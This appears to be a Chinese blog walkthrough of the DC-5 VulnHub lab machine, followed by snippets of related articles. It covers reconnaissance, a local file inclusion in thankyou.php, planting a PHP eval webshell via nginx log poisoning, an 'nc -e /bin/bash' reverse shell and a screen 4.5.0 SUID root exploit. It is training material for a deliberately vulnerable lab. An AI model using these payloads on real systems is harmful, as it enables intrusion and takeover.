dc5靶机

已于 2023-11-04 16:42:34 修改
阅读量160 收藏
点赞数 6
分类专栏: 靶机训练 文章标签: 网络安全
于 2023-11-04 16:30:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ybk6666/article/details/134219504
版权

对于这个靶机的提权部分,我这里并没有什么拆分成三份文件的做法,直接赋权执行就可以拿到root了,不懂为什么要复杂化,之前也是问过一些做的人,他们都说网上都这样子去做,但是我不太懂那样做的原因,如果有懂的大佬,还希望能帮我解答一下,谢谢。

信息收集

首先查看一下我们kali的ip地址和网段

输入命令:

ifconfig //查看当前虚拟机ip地址

可以得到信息,我们kali的ip是192.168.187.133 网段是192.168.187.0/24
在这里插入图片描述
查看虚拟机网关

输入命令:

route -n //查看网关

可以知晓我们的网关是192.168.187.2

在这里插入图片描述

接下来我们这里使用arp-scan生成网络接口地址,排除掉错误信息,可以发现目标ip为192.168.187.137

在这里插入图片描述

nmap端口开放扫描

TCP

输入命令:

nmap -min-rate 10000   -p-  192.168.187.137

可以到开放3个端口

在这里插入图片描述

UDP

输入命令:

sudo nmap -sU -min-rate 10000   -p-  192.168.187.137

发现也开放了2个端口

在这里插入图片描述

nmap端口信息扫描

输入命令:

nmap -sC -sT -A   -p 80,111,55068  192.168.187.137

除了80端口,还有2个rpc端口

在这里插入图片描述

nmap漏洞脚本扫描

输入命令:

nmap --script=vuln  -p 80,111,55068 192.168.187.137

但是没有发现什么可以直接利用的漏洞
在这里插入图片描述
在这里插入图片描述

登录web端

在浏览器输入192.168.187.137进行搜索。

在这里插入图片描述

通过wappalyzer可以查看他的服务器部署是nginx。

在这里插入图片描述

我们可以使用工具对这个目录进行扫描查看有没有子目录。

输入命令:

dirb http://192.168.187.137

在这里插入图片描述

还可以使用工具gobuster来扫描

输入命令:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x html -u http://192.168.187.137

在这里插入图片描述

这里扫描到了两个子目录

/images

/css

我们登陆下这两个界面,发现也没有得到有用的信息。

在这里插入图片描述

dirsearch工具

dirsearch是一个基于python的高级命令行工具, 旨在对web服务器中的目录和文件进行暴力破解。它和我们平时使用的dirb、御剑等工具一样,就是为了扫描网站的敏感文件和目录从而找到突破口。

输入命令:

dirsearch  -u   http://192.168.187.137

可以搜集到这些信息,可以登陆查看一下

在这里插入图片描述

最终查找一番后,我们可以在contact这个页面下,找到可以互动的地方

在这里插入图片描述

这里我们随便写个东西提交一下,看看有没有什么信息展示出来。

在这里插入图片描述

文件包含

嗯??刚刚这里还是2019,现在就成了2018了?有问题。再看一下上面的url信息,发现我们刚刚输入的123已经展示在url上面,抓包一下看看有没有发现。

这里先打开我们的(foxyproxy)火狐代理。

在这里插入图片描述

然后打开我们的burpsuite,将我们的代理打开也就是调整为on的状态。

在这里插入图片描述

设置好以后,我们这里再重新输入信息,进行抓包。

在这里插入图片描述

发现这里已经截取到了信息内容。

在这里插入图片描述

我们这里将信息发送到repeater模块,右键点击send to repeater

在这里插入图片描述

这里我们进入到repeater模块,点击send发送后发现,这里一直再改变。

在这里插入图片描述

再次点击send后发现还在改变。

在这里插入图片描述

结合之前的信息,我们提交信息时,是用到了这个thankyou.php,但是在代码中可以看到这个footer下的Copyright © 2017也会改变,推测八成是thankyou.php对footer.php文件进行了文件包含。

bp爆破参数名

这里我们爆破一下参数名,首先右键将信息发送到intruder入侵模块

在这里插入图片描述

然后进入到intruder模块中我们这样设置。

在这里插入图片描述

我们首先将上面的信息删除掉。

在这里插入图片描述

接下里我们随便猜测一下他的参数名,这里如图所示

在这里插入图片描述

由于我们要爆破参数名,这里要将我们设置的参数名abc添加标记,选中abc点击右边的add

在这里插入图片描述

然后点击旁边的payloads

在这里插入图片描述

点击add from list ,选择filenames,确定以后点击右上角开始爆破。

在这里插入图片描述

发现爆破成功,参数名为file

在这里插入图片描述

这里尝试一下我们的参数名是否有效,返回到我们刚刚的repeater界面,将参数修改一下,改为file=/etc/passwd,然后点击send发送。

在这里插入图片描述

发现成功显示出用户信息。文件包含确实存在。

在这里插入图片描述

上传一句话木马

我们这里就可以利用文件包含来反弹shell,即先用bp向日志文件写入一句话木马

<?php eval(@$_POST['a']); ?>  //一句话木马

然后通过日志文件执行命令,连接蚁剑

首先我们可以通过burpsuite来向这个靶机的日志文件中上传一句话木马,我们在刚刚的repeater模块里,再次修改信息。然后点击send

在这里插入图片描述

中国蚁剑连接

然后我们就可以使用蚁剑来连接我们上传的一句话木马,这里搜索了一下ngnix的日志文件路径,发现是在/var/log/nginx/error.log,

尝试测试连接成功了

在这里插入图片描述

那我们可以在蚁剑的虚拟终端里使用nc命令回弹到kali中

首先在我们的kali中设置一个监听端口

在这里插入图片描述

然后在蚁剑中

输入命令:

nc -e /bin/bash 192.168.187.128 8888

在这里插入图片描述

回到kali中即可发现反弹成功。

在这里插入图片描述

交互式shell

输入命令:

python -c ‘import pty;pty.spawn(“/bin/bash”)’

在这里插入图片描述

suid提权

这里使用suid提权

输入命令:

find / -perm -4000 2>/dev/null

这里要利用的是这个文件

在这里插入图片描述

直接 kali 里搜索screen 4.5.0 的漏洞,发现了两个漏洞

在这里插入图片描述

这里尝试第一个文件能否成功,先将文件拷贝到本地

在这里插入图片描述

开启http临时服务

在这里插入图片描述

wget下载

然后在靶机中的/tmp目录下载这个文件

在这里插入图片描述

赋权执行

然后赋予文件可执行权限然后执行

在这里插入图片描述

拿到flag

发现成功提权到root用户了,然后我们在/root下拿到最终的flag

在这里插入图片描述

遥不可及的,梦!
关注
专栏目录
DC5靶机练习
LSYZWF的博客
04-27 232
文章目录1、查看靶机mac地址2、开始扫描3、扫描根目录下的文件4、包含一句话木马5、写入成功,用蚁剑连接6、建立反弹shell,建立长久连接7、考虑提权 实验环境:DC-5靶机,kali攻击机 靶机: 链接:https://pan.baidu.com/s/1naWHuZDDwWOI2zqO6vG6OA 提取码:rkzw 1、查看靶机mac地址 2、开始扫描 先扫描C网段 该靶机的IP地址为192.168.246.146 再扫描端口开放情况(-p-也表示扫描全端口) 开放了80端口,可以通过浏览器
DC系列05】DC-5靶机复盘
weixin_44681307的博客
07-09 146
利用中国蚁剑登陆一下这个shell,我们进行一个nc反弹shell到我们的kali中,蚁剑的是虚拟终端,不是真正的终端,提权不会成功。用bp抓一下包,get一段木马代码,再查看这个日志文件时候发现xxx还在,但是php代码不见了,说明代码被成功执行了。提交后就进入这个页面了,当我们每次刷新时候会发现下面的年份是会变化的,所以猜测这个网页肯定有一个文件包含漏洞。搜索一下有root权限的文件,发现有一个screen=4.5.0,我们去搜索一下这个有没有漏洞。发现有两个可以利用的漏洞文件。
dc-5 靶机渗透学习
..
03-20 1945
信息收集 扫描存活主机 nmap -sP 192.168.202.0/24 对靶机开放的端口服务进行扫描 nmap -A -p- -v 192.168.202.143 漏洞利用 访问80端口 ,用Wappalyzer识别框架,发现只是个简单的页面 查看一下源代码,发现有五个php文件,分别对应五个标题 来到Contact查看了一下,发现有几个地方可以填写信息,抓取发送的数据包查看了一下,没什么特别。 发送数据后会跳转到thankyou.php,并且...
DC5靶机
qq_40646572的博客
05-04 357
信息收集 开启dc5靶机。 先使用nmap扫描网段,发现dc5靶机,192.168.85.132.该靶机开启了 80端口以及111端口。 使用nmap未曾识别出端口服务。 web服务攻击 打开80服务的http服务。 大致看了下web服务的各项功能,发现concat页面中存在数据交互。 多次进行数据提交后,发现提交后的页面下面的Copyright ©数字一直在变动,怀疑此处有问题。 先尝试将存在参数交互的地方,尝试下sql注入。使用sqlmap跑一下,发现没有不存在注入点。 同时,扫描下目录。
DC系列5靶机实战
qq_43462485的博客
10-28 652
DC-5靶机实战 攻击机:kali 192.168.43.16 目标机:dc-5 192.168.43.251 一、信息收集 1.使用kali自带的arp-scan -l进行同网段主机发现,然后使用nmap进行端口扫描 2.发现开放80端口的web服务,溜了一圈没找到什么信息,还是参考了一下大佬的思路 发现提交contact信息后每次刷新thank you的界面下面的数值都会变化,第一次遇到这种类型 参考大佬后发现可能是LFI(本地文件包含)漏洞 3.通过burp抓包,对参数进行
【Vulnhub靶机渗透测试】之DC-5(screen-4.5.0漏洞脚本提权)
Pluto.的博客
12-29 1797
文章目录Vulnhub靶机渗透测试之DC-51. 信息收集2. 漏洞利用3. 提权 Vulnhub靶机渗透测试之DC-5 环境搭建 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-5,314/; 需要将靶机和kali攻击机放在同一个局域网里; kali的IP地址:192.168.40.142。 1. 信息收集 2. 漏洞利用 3. 提权 ...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
DC3靶机渗透测试练习
10-05
DC3靶机渗透测试练习 DC3靶机渗透测试练习是网络安全领域中的一个重要实践项目,旨在帮助安全测试人员和渗透测试人员提高自己的技能和经验。本文将详细介绍 DC3靶机渗透测试练习的各个阶段和步骤,以及每个阶段的...
【Vulnhub靶机DC-5(suid提权)
最新发布
过期的秋刀鱼
08-06 344
信息收集主机发现 netdiscouver端口扫描 nmap目录爆破 dirsearch漏洞利用bp抓包分析footer.php,有文件包含漏洞木马上传,查看日志反弹shellpython交互shell提权 find / -user root -perm /4000 2 > /dev/nulllibhax.c和rootshell.c文件的编译 run.sh bash ./run.sh 提权。
靶机6 DC-5(过程超详细)
honest_gg的博客
09-26 885
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 2671
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulnhub靶机渗透DC-5
RestoreJustice的博客
03-17 182
前面收集信息,我们知道靶机使用nginx站点,nginx日志默认路径为/var/log/nginx/access.log。直接访问:http://192.168.80.134/%3C?反弹shell到kail中:nc -e /bin/bash/ 192.168.80.130 10086,然后利用python反弹,获得交互式shell,方便使用:python -c ‘import pty;这里连接到虚拟网卡1。下载地址:https://www.vulnhub.com/entry/dc-5,314/
靶机 dc系列 dc-5
wl0326ghb的博客
06-15 114
导入靶机
这篇 教你玩转渗透测试靶机vulnhub——DC5
Aluxian_的博客
03-25 6525
Vulnhub靶机DC5渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:文件包含: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC5,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址: https://download.vulnhub.co
DC-5靶机渗透详细步骤
wwxxss
10-18 737
DC5渗透测试
Vulnhub靶场渗透测试系列DC-5(screen提权)
qq_45722813的博客
11-23 2875
Vulnhub靶场渗透测试系列DC-5 下载地址:https://www.vulnhub.com/entry/dc-5,314/ 攻击机为kali2021,IP地址:192.168.172.131 下载好靶机导入VMware虚拟机,将网络模式设置为NAT模式,然后开启虚拟机 使用命令nmap -T4 -Pn 192.168.172.1/24进行主机发现,获取靶机的IP地址 使用命令nmap -T4 -A -p- 192.168.172.139扫描靶机的操作系统,开放端口和对应的服务使用的中间件等信息
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8479
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值